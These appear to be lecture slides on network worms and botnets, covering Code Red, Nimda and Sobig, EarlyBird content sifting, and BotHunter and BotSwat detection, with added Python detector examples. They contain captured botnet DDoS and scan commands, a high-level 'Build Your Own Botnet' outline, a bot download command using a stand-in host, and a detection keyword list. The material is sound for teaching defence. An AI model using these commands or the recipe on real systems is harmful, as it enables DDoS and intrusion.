
Network Worms and Bots  



  1. Network Worms and Bots  

  2. Outline
  • Worms
    • Worm examples and propagation methods
    • Detection methods
      • Traffic patterns: EarlyBird
      • Vulnerabilities: Generic Exploit Blocking
    • Disabling worms
      • Generate signatures for network or host-based filters
  • Bots
    • Structure and use of bots
    • Recognizing bot propagation
    • Recognizing bot operation
      • Network-based methods
      • Host-based methods

  3. Worm
  • A worm is self-replicating software designed to spread through the network
    • Typically exploits security flaws in widely used services
  • Can cause enormous damage
    • Launch DDoS attacks, install bot networks
    • Access sensitive information
    • Cause confusion by corrupting the sensitive information
  • Worm vs. virus vs. Trojan horse
    • A virus is code embedded in a file or program
    • Viruses and Trojan horses rely on human intervention
    • Worms are self-contained and may spread autonomously

  4. Cost of worm attacks
  • Morris worm, 1988
    • Infected approximately 6,000 machines
      • 10% of computers connected to the Internet
    • Cost ~ $10 million in downtime and cleanup
  • Code Red worm, July 16 2001
    • Direct descendant of Morris’ worm
    • Infected more than 500,000 servers
    • Programmed to go into infinite sleep mode July 28
    • Caused ~ $2.6 billion in damages
  • Love Bug worm: $8.75 billion
  Statistics: Computer Economics Inc., Carlsbad, California

  5. Internet Worm (first major attack)
  • Released November 1988
  • Program spread through Digital, Sun workstations
  • Exploited Unix security vulnerabilities
    • VAX computers and SUN-3 workstations running versions 4.2 and 4.3 Berkeley UNIX code
  • Consequences
    • No immediate damage from program itself
    • Replication and threat of damage
      • Load on network, systems used in attack
      • Many systems shut down to prevent further attack

  6. Some historical worms of note
  [Table of historical worms from Kienzle and Elder; not reproduced in the transcript]

  7. Increasing propagation speed
  • Code Red, July 2001
    • Affects Microsoft Index Server 2.0, the Windows 2000 Indexing Service on Windows NT 4.0, and Windows 2000 systems that run IIS 4.0 and 5.0 web servers
    • Exploits known buffer overflow in Idq.dll
    • Vulnerable population (360,000 servers) infected in 14 hours
  • SQL Slammer, January 2003
    • Affects Microsoft SQL 2000
    • Exploits known buffer overflow vulnerability
      • Server Resolution service vulnerability reported June 2002
      • Patch released in July 2002, Bulletin MS02-39
    • Vulnerable population infected in less than 10 minutes

  8. Code Red
  • Initial version released July 13, 2001
  • Sends its code as an HTTP request
    • HTTP request exploits buffer overflow
    • Malicious code is not stored in a file: placed in memory and then run
  • When executed,
    • Worm checks for the file C:\Notworm
      • If file exists, the worm thread goes into infinite sleep state
    • Creates new threads
      • If the date is before the 20th of the month, the next 99 threads attempt to exploit more computers by targeting random IP addresses

  9. Code Red of July 13 and July 19
  • Initial release of July 13
    • 1st through 20th of month: spread
      • via random scan of 32-bit IP address space
    • 20th through end of each month: attack
      • Flooding attack against 198.137.240.91 (www.whitehouse.gov)
    • Failure to seed random number generator → linear growth
  • Revision released July 19, 2001
    • White House responds to threat of flooding attack by changing the address of www.whitehouse.gov
      • Causes Code Red to die for date ≥ 20th of the month
    • But: this time random number generator correctly seeded
  Slides: Vern Paxson

  10. Code Red 2
  • Released August 4, 2001
  • Comment in code: “Code Red 2.”
    • But in fact completely different code base
  • Payload: a root backdoor, resilient to reboots
  • Bug: crashes NT, only works on Windows 2000
  • Localized scanning: prefers nearby addresses
  • Kills Code Red 1
  • Safety valve: programmed to die Oct 1, 2001
  Slides: Vern Paxson

  11. Striving for Greater Virulence: Nimda
  • Released September 18, 2001
  • Multi-mode spreading:
    • attack IIS servers via infected clients
    • email itself to address book as a virus
    • copy itself across open network shares
    • modifying Web pages on infected servers w/ client exploit
    • scanning for Code Red II backdoors (!)
      • worms form an ecosystem!
  • Leaped across firewalls
  Slides: Vern Paxson

  12. [Figure: worm activity over time, with these annotations] Code Red 2 kills off Code Red 1; Nimda enters the ecosystem; CR 1 returns thanks to bad clocks; Code Red 2 settles into weekly pattern; Code Red 2 dies off as programmed
  Slides: Vern Paxson

  13. How do worms propagate?
  • Scanning worms
    • Worm chooses “random” address
  • Coordinated scanning
    • Different worm instances scan different addresses
  • Flash worms
    • Assemble tree of vulnerable hosts in advance, propagate along tree
    • Not observed in the wild, yet
    • Potential for 10^6 hosts in < 2 sec! [Staniford]
  • Meta-server worm
    • Ask server for hosts to infect (e.g., Google for “powered by phpbb”)
  • Topological worm
    • Use information from infected hosts (web server logs, email address books, config files, SSH “known hosts”)
  • Contagion worm
    • Propagate parasitically along with normally initiated communication

  14. Worm Detection and Defense
  • Detect via honeyfarms: collections of “honeypots”
    • Any outbound connection from honeyfarm = worm (at least, that’s the theory)
    • Distill signature from inbound/outbound traffic
    • If honeypot covers N addresses, expect detection when worm has infected 1/N of population
  • Thwart via scan suppressors: network elements that block traffic from hosts that make failed connection attempts to too many other hosts
  • 5 minutes to several weeks to write a signature
  • Several hours or more for testing

  15. Signature inference
  • Monitor network and look for strings common to traffic with worm-like behavior
  • Signatures can then be used for content filtering
  Slide: S. Savage

  16. Content sifting
  • Assume there exists some (relatively) unique invariant bitstring W across all instances of a particular worm (true today, not tomorrow...)
  • Two consequences
    • Content Prevalence: W will be more common in traffic than other bitstrings of the same length
    • Address Dispersion: the set of packets containing W will address a disproportionate number of distinct sources and destinations
  • Content sifting: find W’s with high content prevalence and high address dispersion and drop that traffic
  Slide: S. Savage

  17.–21. The basic algorithm (Stefan Savage, UCSD)
  [Figure: a detector in the network watches hosts A, B, C, D, E and cnn.com and keeps a Prevalence Table and an Address Dispersion Table (Sources, Destinations); the five slides show the tables after each packet]
  • Slide 17: both tables empty
  • Slide 18: first string seen once: prevalence 1, sources 1 (A), destinations 1 (B)
  • Slide 19: a second string seen once: prevalence 1, sources 1 (C), destinations 1 (A)
  • Slide 20: first string: prevalence 2, sources 2 (A,B), destinations 2 (B,D); second string unchanged at 1, (C), (A)
  • Slide 21: first string: prevalence 3, sources 3 (A,B,D), destinations 3 (B,D,E); second string unchanged at 1, (C), (A)
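A toy version of the content sifting algorithm from slides 16–21, added here as an illustration rather than Savage's EarlyBird code: it keeps the prevalence and address dispersion tables over constructed packets that follow the slide sequence (W travels A→B, B→D, D→E while an unrelated request goes C→A). The window size, the thresholds and the payload bytes are assumptions.

```python
from collections import defaultdict

WINDOW = 8         # bytes per content fingerprint (toy: the raw substring is the fingerprint)
PREVALENCE_T = 3   # minimum packets a substring must appear in (assumed threshold)
DISPERSION_T = 3   # minimum distinct sources AND distinct destinations (assumed threshold)

class ContentSifter:
    """Prevalence table plus address dispersion table, as on slides 17-21."""
    def __init__(self, window=WINDOW):
        self.window = window
        self.prevalence = defaultdict(int)     # substring -> number of packets carrying it
        self.sources = defaultdict(set)        # substring -> distinct source addresses
        self.destinations = defaultdict(set)   # substring -> distinct destination addresses

    def observe(self, src, dst, payload):
        # count each distinct substring once per packet, then record the endpoints
        seen = {payload[i:i + self.window] for i in range(len(payload) - self.window + 1)}
        for sub in seen:
            self.prevalence[sub] += 1
            self.sources[sub].add(src)
            self.destinations[sub].add(dst)

    def suspicious(self, prevalence_t=PREVALENCE_T, dispersion_t=DISPERSION_T):
        # a substring is sifted out only when it is both prevalent and widely dispersed
        return {
            sub: (count, frozenset(self.sources[sub]), frozenset(self.destinations[sub]))
            for sub, count in self.prevalence.items()
            if count >= prevalence_t
            and len(self.sources[sub]) >= dispersion_t
            and len(self.destinations[sub]) >= dispersion_t
        }

# Constructed traffic mirroring the slides: an invariant W from A->B, B->D, D->E
# and one ordinary request from C->A. Both payloads are made up for this example.
WORM_W = b"\x90\x90INVARIANT-WORM-BYTES\x90\x90"
NORMAL = b"GET /index.html HTTP/1.0"
TRACE = [("A", "B", WORM_W), ("C", "A", NORMAL), ("B", "D", WORM_W), ("D", "E", WORM_W)]

def run_trace(trace=TRACE):
    sifter = ContentSifter()
    for src, dst, payload in trace:
        sifter.observe(src, dst, payload)
    return sifter.suspicious()

if __name__ == "__main__":
    for sub, (count, srcs, dsts) in sorted(run_trace().items()):
        print(sub, count, sorted(srcs), sorted(dsts))
```

Every window of W reaches prevalence 3 with sources (A,B,D) and destinations (B,D,E), exactly the slide 21 tables, while the ordinary request never crosses the thresholds. A real deployment must also exempt protocol headers that every client sends, since those cross both thresholds without being a worm.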

  22. Challenges
  • Computation
    • To support a 1Gbps line rate we have 12us to process each packet, at 10Gbps 1.2us, at 40Gbps…
    • Dominated by memory references; state expensive
    • Content sifting requires looking at every byte in a packet
  • State
    • On a fully-loaded 1Gbps link a naïve implementation can easily consume 100MB/sec for table
    • Computation/memory duality: on high-speed (ASIC) implementation, latency requirements may limit state to on-chip SRAM
  (Stefan Savage, UCSD)

  23. Worm summary
  • Worm attacks
    • Many ways for worms to propagate
    • Propagation speed is increasing
    • Polymorphic worms, other barriers to detection
  • Detect
    • Traffic patterns: EarlyBird
    • Watch attack: TaintCheck and Sting
    • Look at vulnerabilities: Generic Exploit Blocking
  • Disable
    • Generate worm signatures and use in network or host-based filters

  24. Botnet
  • Collection of compromised hosts
    • Spread like worms and viruses
    • Once installed, respond to remote commands
  • Platform for many attacks
    • Spam forwarding (70% of all spam?)
    • Click fraud
    • Keystroke logging
    • Distributed denial of service attacks
  • Serious problem
    • Top concern of banks, online merchants
    • Vint Cerf: ¼ of hosts connected to Internet

  25. What are botnets used for?
  • Capabilities are exercised via remote commands

  26.–27. Building a Bot Network
  [Figure: the attacker sends compromise attempts to hosts running FreeBSD, Mac OS X and Win XP; the Win XP hosts are compromised and bot software is installed on them]

  28. Step 2
  [Figure: each compromised Win XP host runs the same IRC commands to rally at the server jade.va.dal.net]
  . . . /connect jade.va.us.dal.net /join #hacker . . .

  29. Step 3
  (12:59:27pm) -- A9-pcgbdv (A9-pcgbdv@140.134.36.124) has joined (#owned) Users : 1646
  (12:59:27pm) (@PhaTTy) .ddos.synflood 216.209.82.62
  (12:59:27pm) -- A6-bpxufrd (A6-bpxufrd@wp95-81.introweb.nl) has joined (#owned) Users : 1647
  (12:59:27pm) -- A9-nzmpah (A9-nzmpah@140.122.200.221) has left IRC (Connection reset by peer)
  (12:59:28pm) (@PhaTTy) .scan.enable DCOM
  (12:59:28pm) -- A9-tzrkeasv (A9-tzrkeas@220.89.66.93) has joined (#owned) Users : 1650

  30. Spam service
  • Rent-a-bot
  • Cash-out
  • Pump and dump
  • Botnet rental

  31. Underground commerce
  • Market in access to bots
    • Botherd: collects and manages bots
    • Access to proxies (“peas”) sold to spammers, often with commercial-looking web interface
    • Sample rates
      • Non-exclusive access to botnet: 10¢ per machine
      • Exclusive access: 25¢
    • Payment via compromised account (e.g., PayPal) or cash to dropbox
  • Identity theft
    • Keystroke logging
    • Complete identities available for $25 - $200+
      • Rates depend on financial situation of compromised person
      • Include all info from PC files, plus all websites of interest with passwords/account info used by PC owner
      • At $200+, usually includes full credit report
  [Lloyd Taylor, Keynote Systems, SFBay InfraGard Board]

  32. Sobig.a in action
  • Arrives as an email attachment
    • Written in C++
    • Encrypted with Telock to slow analysis
  • User opens attachment, launching trojan
  • Downloads file from a free Geocities account
    • Contains list of URLs pointing to second stage
  • Fetches second-stage trojan
    • Arbitrary executable file – could be anything
    • For Sobig.a, second-stage trojan is Lala

  33. Stage 2 – Lala
  • Communication
    • Lala notifies a cgi script on a compromised host
    • Different versions of Lala have different sites and cgi scripts, perhaps indicating tracking by author
  • Installation
    • Lala installs a keylogger and password-protected Lithium remote access trojan
    • Lala downloads Stage 3 trojan
      • Wingate proxy (commercial software)
  • Cleanup
    • Lala removes the Sobig.a trojan

  34. Stage 3 – Wingate
  • Wingate is a general-purpose port proxy server
    • 555/TCP – RTSP
    • 608/TCP – Remote Control Service
    • 1180/TCP – SOCKS
    • 1181/TCP – Telnet Proxy
    • 1182/TCP – WWW Proxy
    • 1183/TCP – FTP Proxy
    • 1184/TCP – POP3 Proxy
    • 1185/TCP – SMTP Server
  • Final state of compromised machine
    • Complete remote control by Lithium client with password “adm123”
    • Complete logging of user’s keystrokes
    • Usable for spam relay, http redirects
    • Wingate Gatekeeper client can connect to 608/TCP, can log/change everything

  35. Build Your Own Botnet
  • Pick a vector mechanism
    • IRC Channels: DCC Filesends, Website Adverts to Exploit Sites
    • Scan & Sploit: MSBlast
    • Trojan: SoBig/BugBear/ActiveX Exploits
  • Choose a Payload
    • Backdoors
      • Agobot, SubSeven, DeepThroat
    • Most include mechanisms for DDoS, self-spreading, download/exec arbitrary code, password stealers
  • Do it
    • Compromise an IRC server, or use your own zombied machines
    • Configure Payload to connect to selected server
    • Load encryption keys and codes
    • Release through appropriate compromised systems
    • Sit back and wait, or start on your next Botnet
  [Lloyd Taylor, Keynote Systems, SFBay InfraGard Board]

  36. Bot detection methods
  • Signature-based (most AV products)
  • Rule-based
    • Monitor outbound network connections (e.g. ZoneAlarm, BINDER)
    • Block certain ports (25, 6667, ...)
  • Hybrid: content-based filtering
    • Match network packet contents to known command strings (keywords)
    • E.g. Gaobot ddos cmds: .ddos.httpflood
  • Network traffic monitoring
    • Wenke Lee, Phil Porras: BotHunter, …
      • Correlate various NIDS alarms to identify “bot infection sequence”
    • GA Tech: recognize traffic patterns associated with DDNS-based rallying
    • Stuart Staniford, FireEye
      • Detect port scanning to identify suspicious traffic
      • Emulate host with taint tracking to identify exploit
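An added example of the content-based filtering and rallying detection described on slide 36 (not code from the lecture or from any product named there): it parses IRC channel lines in the format of slide 29, flags the command keywords the lecture lists, and reports bursts of joins within one second as a rallying indicator. The log lines, nicknames and addresses are constructed, and the burst threshold is an assumption.

```python
import re
from collections import Counter

# Command keywords named in the lecture (Gaobot/Agobot-style dotted commands).
KNOWN_COMMANDS = {".ddos.synflood", ".ddos.httpflood", ".scan.enable"}
JOIN_BURST = 3   # joins inside one second that we treat as rallying (assumed threshold)

# Line shapes follow the slide 29 capture: "(hh:mm:sspm) (nick) text" for chat,
# "(hh:mm:sspm) -- nick (user@host) has joined (#chan) Users : N" for joins.
MSG_RE = re.compile(r"^\((?P<ts>\d+:\d+:\d+[ap]m)\) \((?P<nick>@?[\w-]+)\) (?P<text>.+)$")
JOIN_RE = re.compile(r"^\((?P<ts>\d+:\d+:\d+[ap]m)\) -- (?P<nick>\S+) \([^)]*\) has joined \((?P<chan>#\w+)\)")

def analyze_irc_log(lines, join_burst=JOIN_BURST):
    """Return bot commands seen and per-second join counts that look like rallying."""
    commands, joins = [], Counter()
    for line in lines:
        m = JOIN_RE.match(line)
        if m:
            joins[m["ts"]] += 1
            continue
        m = MSG_RE.match(line)
        if not m:
            continue                       # parts, quits, server notices: ignored here
        verb, _, args = m["text"].partition(" ")
        if verb in KNOWN_COMMANDS:         # keyword match on the first token only
            commands.append((m["ts"], m["nick"], verb, args))
    bursts = {ts: n for ts, n in joins.items() if n >= join_burst}
    return {"commands": commands, "join_bursts": bursts}

# Constructed sample log: three joins in the same second, two herder commands,
# one ordinary chat line and one lone join. Hosts use documentation addresses.
SAMPLE_LOG = [
    "(12:59:27pm) -- A9-aaaa (A9-aaaa@192.0.2.10) has joined (#chan) Users : 1646",
    "(12:59:27pm) (@herder) .ddos.synflood 198.51.100.7",
    "(12:59:27pm) -- A6-bbbb (A6-bbbb@192.0.2.11) has joined (#chan) Users : 1647",
    "(12:59:27pm) -- A9-cccc (A9-cccc@192.0.2.12) has left IRC (Connection reset by peer)",
    "(12:59:27pm) -- A9-dddd (A9-dddd@192.0.2.13) has joined (#chan) Users : 1648",
    "(12:59:28pm) (@herder) .scan.enable DCOM",
    "(12:59:28pm) (alice) hey, is anyone around?",
    "(12:59:31pm) -- bob (bob@192.0.2.20) has joined (#chan) Users : 1649",
]

if __name__ == "__main__":
    print(analyze_irc_log(SAMPLE_LOG))
```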

  37. BotHunter: passive bot detection
  • What is botHunter?
    • Snort-based sensor suite for malware event detection
      • inbound scan detection
      • remote to local exploit detection
        • anomaly detection system for exploits over key TCP protocols
      • botnet-specific egg download banners
      • victim-to-C&C-based communications exchanges
        • particularly for IRC bot protocols
    • Event correlator
      • combines information from sensors to recognize bots that infect and coordinate with your internal network assets
    • Submits “bot-detection profiles” to the Cyber-TA repository infrastructure

  38. Botnet network traffic patterns
  • Unique characteristic: “rallying”
    • Bots spread like worms and trojans
    • Payloads may be common backdoors
    • Centralized control of botnet is characteristic feature
  • Georgia Tech idea: DNS
    • Bots installed at network edge
    • IP addresses may vary, use Dynamic DNS
    • Bots talk to controller, make DDNS lookup
    • Pattern of DDNS lookup is easy to spot for common botnets!
  David Dagon, Sanjeev Dwivedi, Robert Edmonds, Julian Grizzard, Wenke Lee, Richard Lipton, Merrick Furst; Cliff Zou (U Mass)

  39. BotSwat
  • Host-based bot detection
  • Based on idea of remote control commands

  40. What does remote control look like?
  http.execute <URL> <local_path>
  • Invoke system calls:
    • connect, network send and recv, create file, write file, …
  • On arguments received over the network:
    • IP to connect to, object to request, file name, …
  • BotSwat premise
    • We can distinguish the behavior of bots from that of innocuous processes via detecting “remote control”
    • We can approximate “remote control” as “using data received over the network in a system call argument”

  41. [Figure: an agobot process on Windows XP receives http.execute www.badguy.com/malware.exe C:\WIN\bad.exe through the NIC, then issues connect(…,www.badguy.com,…), send(…,“…GET /malware.exe…”,…) and fcreate(…,“C:\WIN\malware.exe”,…); steps 1–8 alternate between the agobot process and the NIC]
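An added example of the BotSwat premise on slides 40–41 (not the BotSwat implementation): a monitor records fragments of data a process receives from the network and raises an alert whenever a later system call argument contains one of them. The agobot-style handler, the benign chat client, the host names and file paths are all constructed for this example.

```python
import re

# Fragments of received data that we track (length 4+ to skip noise like "GET").
TOKEN_RE = re.compile(r"[A-Za-z0-9_.-]{4,}")

class RemoteControlMonitor:
    """Content-based approximation of 'remote control': a system call whose
    string argument carries data the process earlier received over the network."""
    def __init__(self):
        self.taint_tokens = set()
        self.alerts = []

    def recv(self, data):
        # everything arriving from the network is tainted; remember its fragments
        self.taint_tokens.update(TOKEN_RE.findall(data))
        return data

    def syscall(self, name, *args):
        tainted = [a for a in args if isinstance(a, str)
                   and any(tok in a for tok in self.taint_tokens)]
        if tainted:
            self.alerts.append((name, tuple(tainted)))
        return name   # stand-in for the real kernel call

def bot_process(mon, command):
    """Agobot-style http.execute handler: every syscall argument comes from the command."""
    verb, url, local_path = mon.recv(command).split()
    host, _, path = url.partition("/")
    mon.syscall("connect", host, 80)
    mon.syscall("send", f"GET /{path} HTTP/1.0\r\n\r\n")
    mon.syscall("fcreate", local_path)
    return len(mon.alerts)

def benign_process(mon, chat_line):
    """A chat client: receives text too, but its syscall arguments are chosen locally."""
    mon.recv(chat_line)
    mon.syscall("connect", "updates.example.com", 443)
    mon.syscall("fcreate", r"C:\Users\me\chat.log")
    return len(mon.alerts)

if __name__ == "__main__":
    bot = RemoteControlMonitor()
    bot_process(bot, r"http.execute www.example.com/malware.exe C:\WIN\bad.exe")
    print(bot.alerts)   # connect, send and fcreate all carry network-derived data
    print(benign_process(RemoteControlMonitor(), "hey, did you see the news today"))
```

The bot handler trips the check on all three calls while the chat client trips none; a browser following a received link would also trip it, which is why the slide calls this an approximation of remote control.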
